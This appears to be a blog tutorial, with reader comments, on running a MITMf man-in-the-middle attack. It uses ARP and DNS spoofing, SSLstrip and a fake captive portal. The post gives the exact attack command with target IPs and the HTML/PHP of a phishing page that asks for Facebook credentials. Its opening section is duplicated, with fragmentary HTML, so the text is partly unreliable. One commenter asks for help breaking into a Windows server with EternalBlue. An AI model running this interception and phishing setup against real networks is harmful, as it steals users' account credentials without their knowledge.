Using MITMF with SSLSTRIP and Captive Portal options
In this video we will try out a variation of the man-in-the-middle with SSLSTRIP attack that we performed previously.
In MITMF, in addition to ARP spoofing and SSLSTRIP, we will also be using the Captive Portal option.
Please review the videos listed below, if needed:
Bettercap with SSLSTRIP attack - Does it still work ?
SSLSTRIP attacks with Bettercap and MITMF - HSTS and Web browsers
We saw in the previous videos that websites correctly configured for HSTS, can't be attacked using SSLSTRIP. On the other hand, at this moment, a lot of websites still don't use HSTS or have HSTS incorrectly configured - which leaves those websites vulnerable to man-in-the-middle and SSLSTRIP attacks.
Because it is unlikely for a user to browse ONLY correctly configured HSTS websites; an attacker can redirect the SSLSTRIP vulnerable websites to a Captive Portal and trick the user into giving up credentials belonging to websites that can't be attacked directly (for example: social media credentials, email credentials, etc)
Please logon using your Facebook credentials in order to continue using our network:<br>
User: <input type="text" name="user"><br>
Password: <input type="text" name="pass"><br>
<input type="submit">
</form>
<body>
Enjoy tour browsing!
</body>
</html>
An attacker in a real scenario, would make the Captive Portal webpage fancier and more convincing.
The following MITMF command was used to initiate the man-in-the-middle attack using ARP spoofing, SSLSTRIP and Captive Portal options:
./mitmf.py -i eth0 --hsts --spoof --arp --dns --gateway 192.168.254.2 --targets 192.168.254.70 --captive --portalurl http://192.168.254.176/form1
In MITMF, in addition to ARP spoofing and SSLSTRIP, we will also be using the Captive Portal option.
Please review the videos listed below, if needed:
Bettercap with SSLSTRIP attack - Does it still work ?
SSLSTRIP attacks with Bettercap and MITMF - HSTS and Web browsers
We saw in the previous videos that websites correctly configured for HSTS, can't be attacked using SSLSTRIP. On the other hand, at this moment, a lot of websites still don't use HSTS or have HSTS incorrectly configured - which leaves those websites vulnerable to man-in-the-middle and SSLSTRIP attacks.
Because it is unlikely for a user to browse ONLY correctly configured HSTS websites; an attacker can redirect the SSLSTRIP vulnerable websites to a Captive Portal and trick the user into giving up credentials belonging to websites that can't be attacked directly (for example: social media credentials, email credentials, etc)
Captive Portal
The test Captive Portal in the video is a very basic one which uses two files under the /var/www/html/form1 directory: index.html and welcome.phpindex.html
<form action="welcome.php" method="post">Please logon using your Facebook credentials in order to continue using our network:<br>
User: <input type="text" name="user"><br>
Password: <input type="text" name="pass"><br>
<input type="submit">
</form>
welcome.php
<html><body>
Enjoy tour browsing!
</body>
</html>
An attacker in a real scenario, would make the Captive Portal webpage fancier and more convincing.
MITMF
MITMF can be installed from the Kali Linux repository; but in order to use the Captive Portal option, MITMF has to be installed from GitHub - from the following location: https://github.com/byt3bl33d3r/MITMfThe following MITMF command was used to initiate the man-in-the-middle attack using ARP spoofing, SSLSTRIP and Captive Portal options:
./mitmf.py -i eth0 --hsts --spoof --arp --dns --gateway 192.168.254.2 --targets 192.168.254.70 --captive --portalurl http://192.168.254.176/form1
please help, erro " python mitmf.py
ReplyDelete:0: UserWarning: You do not have a working installation of the service_identity module: 'cannot import name opentype'. Please install it from and make sure all of its dependencies are satisfied. Without the service_identity module, Twisted can perform only rudimentary TLS client hostname verification. Many valid certificate/hostname mappings may be rejected.
Traceback (most recent call last):
File "mitmf.py", line 36, in
from plugins import *
File "/root/programas/MITMf/plugins/filepwn.py", line 72, in
from libs.bdfactory import pebin
ImportError: No module named bdfactory "
solved
ReplyDeleteLooks like you didn't install all the prerequisites ... ?
DeleteHow did you solved it? I have the same issue.
DeleteThanks Dude <3
ReplyDeletesubscribed
Thank you my friend :-)
DeleteHi, how're doing?... Well I have a problem hacking into a windows server 2012 R2... I'm using eternalblue. Plz show me how to do itπππππ
ReplyDeletemy mitmf is not showing any captured traffic
ReplyDelete